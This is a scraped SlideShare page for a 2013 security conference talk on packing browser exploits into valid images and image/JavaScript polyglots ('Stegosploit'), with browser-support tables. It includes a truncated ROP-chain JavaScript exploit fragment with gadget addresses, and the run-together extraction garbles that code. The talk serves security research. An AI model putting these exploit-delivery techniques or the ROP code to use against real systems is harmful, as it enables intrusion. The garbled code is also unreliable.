advertisement

Deadly pixels - NSC 2013

50 %
50 %
advertisement
Information about Deadly pixels - NSC 2013
Technology

Published on May 16, 2013

Author: saumilshah

Source: slideshare.net

Description

My presentation at NoSuchCon 2013, Paris. What do you get if you combine art with an exploit? "Deadly Pixels" is the fine art (pun intended) of packaging exploits. The result is a pretty picture with not-so-pretty after effects.

Download PDF - http://www.nosuchcon.com/talks/D1_05_Saumil_Deadly_Pixels.pdf
advertisement

net-squareDeadly PixelsSaumil Shah, NoSuchCon 2013

net-squareSaumil Shah,presented by Deadly PixelsOne day,A mad meta-poet,With nothing to say,Wrote a mad meta-poemThat started "One day,A mad meta-poetWith nothing to say...

net-square#who am iCEONet-SquareReverseEngineeringExploitWritingPenetrationTestingOffensiveSecurityAttackDefenseConferenceSpeakerConferenceTrainerWeb 2.0 HTML5 XSS CSRFSQLi CORS XST clickjackingAJAX FLASH RIA SOAP WebServices UXSS XPATHi ....... <insert buzzwordyappsec jargon here>

net-squareYou either have an 0-day...

net-square...OR ITS HOW YOU USE IT

net-squareA successful exploit......is one that is delivered properly.

net-squareStealth Techniques TodayJSObfuscationBroken FileFormatsOLEEmbeddingJavascript/ActionscriptSpreadingthe payload

net-squareExploit SuccessFactorsIs itfresh?Is there apatch?Can it bedetected?

net-squarePutting together what I knowWebHackingBinaryExploits

net-squareSNEAKYLETHAL

net-squareHiding In Plain Sight

net-square

net-square

net-squareExploits as Grayscale Images•  Grayscale encoding (0-255).•  1 pixel = 1 character.•  Perfectly valid image.G r e e t i n g s P r o f e s s o r F a l k e n

net-squareIm an evil JavascriptIm an innocent image

net-squarefunction packv(n){var s=newNumber(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}varaddressof=newArray();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addressof["call_peax"]=0x6d802597;functioncall_ntallocatevirtualmemory(baseptr,size,callnum){varropnop=packv(addressof["ropnop"]);varpop_eax_ret=packv(addressof["pop_eax_ret"]);varpop_ecx_ret=packv(addressof["pop_ecx_ret"]);varmov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);varmov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);varmov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);varcall_peax_ret=packv(addressof["call_peax_ret"]);varadd_esp_24_ret=packv(addressof["add_esp_24_ret"]);varpopad_ret=packv(addressof["popad_ret"]);var retval=""!<CANVAS>

net-squareSee no eval()

net-squareSame Same No Different!var a = eval(str);a = (new Function(str))();

net-squareIMAJSI iz a Javascript

net-squareIMAJS: Javascript, as an Image!

net-squareIMAJS-GIF Browser SupportHeight Width Browser/Viewer ImageRenders?JavascriptExecutes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE no yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera ? ?2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer no -2f 2a 00 00 Win 7 Preview yes -

net-squareIMAJS-BMP Browser SupportHeight Width Browser/Viewer ImageRenders?JavascriptExecutes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE yes yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer yes -2f 2a 00 00 Win 7 Preview yes -

net-squareStegosploit!

net-squareDemoIMAJS stego FTW!

net-squareIMAJS "loader" scriptAlpha encoded exploit code

net-squareThe Near FutureHTML5CANVASHeap SprayWebGLCyber Cloud BYOD

net-squaresort of close”.@therealsaumilsaumil@net-square.comsort of close".Were the words that the mad poetFinally chose,To bring his mad poemTo some

Add a comment

Related presentations

Presentación que realice en el Evento Nacional de Gobierno Abierto, realizado los ...

In this presentation we will describe our experience developing with a highly dyna...

Presentation to the LITA Forum 7th November 2014 Albuquerque, NM

Un recorrido por los cambios que nos generará el wearabletech en el futuro

Um paralelo entre as novidades & mercado em Wearable Computing e Tecnologias Assis...

Microsoft finally joins the smartwatch and fitness tracker game by introducing the...

Related pages

NoSuchCon

"Deadly Pixels" is the fine art (pun ... from May the 15th to May the 17th of 2013. NSC is the badass ... fr/2013/05/nosuchcon-2013-challenge-write-up-and ...
Read more

REGGAE LOVE SONGS 2014 (FREE 2 HOUR MIX DOWNLOAD) - YouTube

REGGAE LOVE SONGS 2014 (FREE 2 ... Calm And Easy riddim - 2013/2014 49.Deadly ... Reggae Mix Worlds best OLDSKOOL Reggae MIXTAPE STEVE NSC ...
Read more

Safety Topics | Safety Meeting Topics

Safety topics for companies ... HANDHELD GRINDER SAFETY. Handheld grinders can become deadly when used improperly.
Read more

stegosploit_pocgtfo8_submission

Stegosploit Exploit Delivery via Steganography and Polyglots. ... Saumil Shah, NoSuchCon 2013: http://www.slideshare.net/saumilshah/deadly-pixels-nsc-2013;
Read more

Lethal drought leads to reduction in nonstructural ...

Official Full-Text Publication: Lethal drought leads to reduction in nonstructural carbohydrates (NSC) in Norway spruce tree roots but not in the canopy on ...
Read more

Lethal drought leads to reduction in nonstructural ...

Lethal drought leads to reduction in nonstructural carbohydrates in ... We estimated the projected leaf area as the count of pixels ... NSC concentrations ...
Read more

Lethal drought leads to reduction in nonstructural ...

Functional Ecology 2013, 27, 413–427 doi: 10.1111/1365-2435.12046 Lethal drought leads to reduction in nonstructural carbohydrates in Norway spruce tree ...
Read more

Margaret Thatcher and The Falklands | The Sydney Institute

Gerard Henderson’s Sydney Morning Herald column for 1 January 2013 I concluded 2012 ... Margaret Thatcher and The Falklands. ... time for the NSC to ...
Read more